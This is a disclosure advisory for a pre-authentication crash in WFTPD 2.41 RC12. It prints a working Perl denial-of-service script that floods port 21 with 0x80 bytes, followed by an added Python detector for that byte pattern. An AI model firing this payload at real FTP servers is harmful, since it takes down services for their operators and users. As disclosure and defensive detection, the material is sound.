=================================================================
Blue Panda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC12
05/09/2000 (dd/mm/yyyy)

bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=================================================================

Problem: WFTPD will crash if a large string consisting of characters 128-255
is received. A valid user/pass combination is not required to take advantage
of this flaw.

Vulnerable: WFTPD/WFTPD Pro 2.41 RC12 and prior.

Immune: WFTPD/WFTPD Pro 2.41 RC13.

Vendor status: Notified. A fix has been released.

===================
Proof of concept:
===================

#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC12 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends WFTPD string consisting of characters > 127, causing it to crash.
#

use IO::Socket;

$host = "ftp.host.com";
$port = "21";
$sleepfor = 4;

print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

$buffer = "\x80" x 2000;
print $socket "$buffer\n";

$counter = 0;
print "Sleeping for $sleepfor seconds.";
while($counter < $sleepfor) {
    sleep(1);
    print ".";
    $counter += 1;
}
print "\n";

close($socket);
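
Added example (not part of the original advisory, and not vendor code): a Python check for the client side of an FTP control connection that flags the input pattern described under "Problem", for use in a proxy or log pipeline in front of servers that cannot be upgraded to RC13 yet. The thresholds and the names scan_control_stream, MAX_LINE_LEN and MAX_HIGH_BYTES are assumptions, and both sample streams are constructed.

```python
from dataclasses import dataclass

# Assumed thresholds (not from the advisory); tune them for your own traffic.
MAX_LINE_LEN = 512     # cap on one FTP command line, in bytes
MAX_HIGH_BYTES = 64    # bytes 128-255 tolerated per line (e.g. UTF-8 file names)

@dataclass
class Finding:
    line_no: int
    length: int
    high_bytes: int
    before_pass: bool   # True if the client had not yet sent PASS
    reason: str

def scan_control_stream(data: bytes) -> list:
    """Scan the client-to-server bytes of one FTP control connection."""
    findings = []
    pass_seen = False
    for line_no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        high = sum(1 for b in line if b >= 0x80)
        reasons = []
        if len(line) > MAX_LINE_LEN:
            reasons.append("overlong line")
        if high > MAX_HIGH_BYTES:
            reasons.append("high-bit byte flood")
        if reasons:
            findings.append(Finding(line_no, len(line), high,
                                    not pass_seen, ", ".join(reasons)))
        # Client-side view only: PASS sent does not prove the login succeeded.
        if line[:5].upper() == b"PASS ":
            pass_seen = True
    return findings

# Constructed sample streams (not captured traffic).
BENIGN = (b"USER anonymous\r\nPASS guest@example.org\r\n"
          b"RETR r\xc3\xa9sum\xc3\xa9.txt\r\n")
TRIGGER = b"\x80" * 2000 + b"\n"   # same shape as the advisory's $buffer

if __name__ == "__main__":
    for name, stream in (("benign", BENIGN), ("trigger", TRIGGER)):
        print(name, scan_control_stream(stream))
```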